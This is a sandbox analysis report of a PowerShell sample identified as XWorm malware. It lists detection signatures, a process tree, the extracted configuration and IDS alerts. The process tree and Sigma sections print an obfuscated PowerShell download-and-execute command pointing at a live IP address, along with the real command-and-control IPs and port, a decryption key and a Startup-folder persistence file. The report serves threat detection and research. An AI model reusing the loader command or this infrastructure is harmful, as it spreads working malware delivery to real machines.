Edit tour

Windows Analysis Report
b.ps1

Overview

General Information

Sample name:	b.ps1
Analysis ID:	1631444
MD5:	f9f9de640892125580df5b38130a7907
SHA1:	d302a124e12458b9b45ed87d3d03e7765b225bbd
SHA256:	f560fcadfba19c9b4bb2e063b72661b7d1041d0dba196d6126a625f0f932986c
Tags:	bookingclickfixfakecaptchaps1user-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

Found malicious URL file

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powerup Write Hijack DLL

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 3108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5036 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\cmd.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5884 cmdline: powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')|IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 6408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 6996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF06A.tmp" "c:\Users\user\AppData\Local\Temp\n1s2ptvo\CSC91C88865B5A942288A2995E4BC5B419D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

MSBuild.exe (PID: 6752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 4488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

notepad.exe (PID: 972 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\b.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["185.7.214.108", "185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5f71:$str01: $VB$Local_Port 0x5f62:$str02: $VB$Local_Host 0x6268:$str03: get_Jpeg 0x5c1a:$str04: get_ServicePack 0x6c36:$str05: Select * from AntivirusProduct 0x6e34:$str06: PCRestart 0x6e48:$str07: shutdown.exe /f /r /t 0 0x6efa:$str08: StopReport 0x6ed0:$str09: StopDDos 0x6fc6:$str10: sendPlugin 0x7046:$str11: OfflineKeylogger Not Enabled 0x719e:$str12: -ExecutionPolicy Bypass -File " 0x72c7:$str13: Content-length: 5235
C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.dll	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7370:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x740d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7522:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x71e2:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000003.2297360243.0000000004FF5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000007.00000003.2297360243.0000000004FF5000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6360:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x63fd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6512:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x61d2:$cnc4: POST / HTTP/1.1
00000007.00000003.2295875521.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000007.00000003.2295875521.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x11360:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x113fd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11512:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x111d2:$cnc4: POST / HTTP/1.1
0000000A.00000002.4667563397.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000A.00000002.4667563397.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6aa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6b45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6c5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x691a:$cnc4: POST / HTTP/1.1
0000000A.00000002.4669087247.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: csc.exe PID: 6408	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: MSBuild.exe PID: 4488	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.MSBuild.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
10.2.MSBuild.exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x58a9:$str01: $VB$Local_Port 0x589a:$str02: $VB$Local_Host 0x5ba0:$str03: get_Jpeg 0x5552:$str04: get_ServicePack 0x656e:$str05: Select * from AntivirusProduct 0x676c:$str06: PCRestart 0x6780:$str07: shutdown.exe /f /r /t 0 0x6832:$str08: StopReport 0x6808:$str09: StopDDos 0x68fe:$str10: sendPlugin 0x697e:$str11: OfflineKeylogger Not Enabled 0x6ad6:$str12: -ExecutionPolicy Bypass -File " 0x6bff:$str13: Content-length: 5235
10.2.MSBuild.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6b1a:$cnc4: POST / HTTP/1.1
7.3.csc.exe.4ff46b8.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.csc.exe.4ff46b8.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3aa9:$str01: $VB$Local_Port 0x3a9a:$str02: $VB$Local_Host 0x3da0:$str03: get_Jpeg 0x3752:$str04: get_ServicePack 0x476e:$str05: Select * from AntivirusProduct 0x496c:$str06: PCRestart 0x4980:$str07: shutdown.exe /f /r /t 0 0x4a32:$str08: StopReport 0x4a08:$str09: StopDDos 0x4afe:$str10: sendPlugin 0x4b7e:$str11: OfflineKeylogger Not Enabled 0x4cd6:$str12: -ExecutionPolicy Bypass -File " 0x4dff:$str13: Content-length: 5235
7.3.csc.exe.4ff46b8.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4ea8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x505a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4d1a:$cnc4: POST / HTTP/1.1
7.3.csc.exe.4ff46b8.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.csc.exe.4ff46b8.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3aa9:$str01: $VB$Local_Port 0x3a9a:$str02: $VB$Local_Host 0x3da0:$str03: get_Jpeg 0x3752:$str04: get_ServicePack 0x476e:$str05: Select * from AntivirusProduct 0x496c:$str06: PCRestart 0x4980:$str07: shutdown.exe /f /r /t 0 0x4a32:$str08: StopReport 0x4a08:$str09: StopDDos 0x4afe:$str10: sendPlugin 0x4b7e:$str11: OfflineKeylogger Not Enabled 0x4cd6:$str12: -ExecutionPolicy Bypass -File " 0x4dff:$str13: Content-length: 5235
7.3.csc.exe.4ff46b8.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4ea8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x505a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4d1a:$cnc4: POST / HTTP/1.1
7.3.csc.exe.4ff46b8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.csc.exe.4ff46b8.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x58a9:$str01: $VB$Local_Port 0x589a:$str02: $VB$Local_Host 0x5ba0:$str03: get_Jpeg 0x5552:$str04: get_ServicePack 0x656e:$str05: Select * from AntivirusProduct 0x676c:$str06: PCRestart 0x6780:$str07: shutdown.exe /f /r /t 0 0x6832:$str08: StopReport 0x6808:$str09: StopDDos 0x68fe:$str10: sendPlugin 0x697e:$str11: OfflineKeylogger Not Enabled 0x6ad6:$str12: -ExecutionPolicy Bypass -File " 0x6bff:$str13: Content-length: 5235
7.3.csc.exe.4ff46b8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6b1a:$cnc4: POST / HTTP/1.1
Click to see the 7 entries

Other

Source	Rule	Description	Author	Strings
amsi32_5884.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3108, TargetFilename: C:\Windows\Temp\cmd.bat

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4508, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", ProcessId: 3108, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')|IEX", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline", ProcessId: 6408, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3108, TargetFilename: C:\Windows\Temp\cmd.bat

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5884, TargetFilename: C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4508, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\b.ps1", ProcessId: 3108, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3108, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "$GR9='ject Net.WebCli';$KX4='loadString(''http://185.7.214.54/a.mp4'')';$GQ7='ent).Down';$IL3='(New-Ob';$TC=IEX ($IL3,$GR9,$GQ7,$KX4 -Join '')|IEX", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n1s2ptvo\n1s2ptvo.cmdline", ProcessId: 6408, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T05:37:25.638093+0100	2019714	2	Potentially Bad Traffic	192.168.2.6	49715	185.7.214.54	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T05:37:25.638093+0100	2803305	3	Unknown Traffic	192.168.2.6	49715	185.7.214.54	80	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T05:37:41.170085+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:37:46.728749+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:37:58.770010+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:10.719884+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:10.898275+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:23.165933+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:35.167439+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:40.724698+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:45.776343+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:48.265373+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:38:56.707698+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:07.879885+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:08.879597+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:09.911534+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:10.719803+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:13.958567+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:14.090294+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:14.219182+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:14.345956+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:14.473280+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:14.601288+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:20.087939+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:20.255310+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:20.562185+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:20.891807+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:20.956995+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:21.124865+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:25.133456+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:25.133528+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:36.460019+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:40.737632+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:46.217220+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:46.344840+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:46.491588+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:56.927335+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:39:57.072698+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:01.069396+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:04.398042+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:07.059132+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:10.806595+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:14.239136+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:15.275183+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:22.349374+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:22.477297+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:23.754583+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:32.677073+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:36.879831+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:40.758052+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:49.004771+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:40:57.051988+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:41:04.411078+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:41:07.459226+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:41:10.824961+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:41:18.618604+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
2025-03-07T05:41:24.223942+0100	2852870	1	Malware Command and Control Activity Detected	185.7.214.108	4411	192.168.2.6	49716	TCP
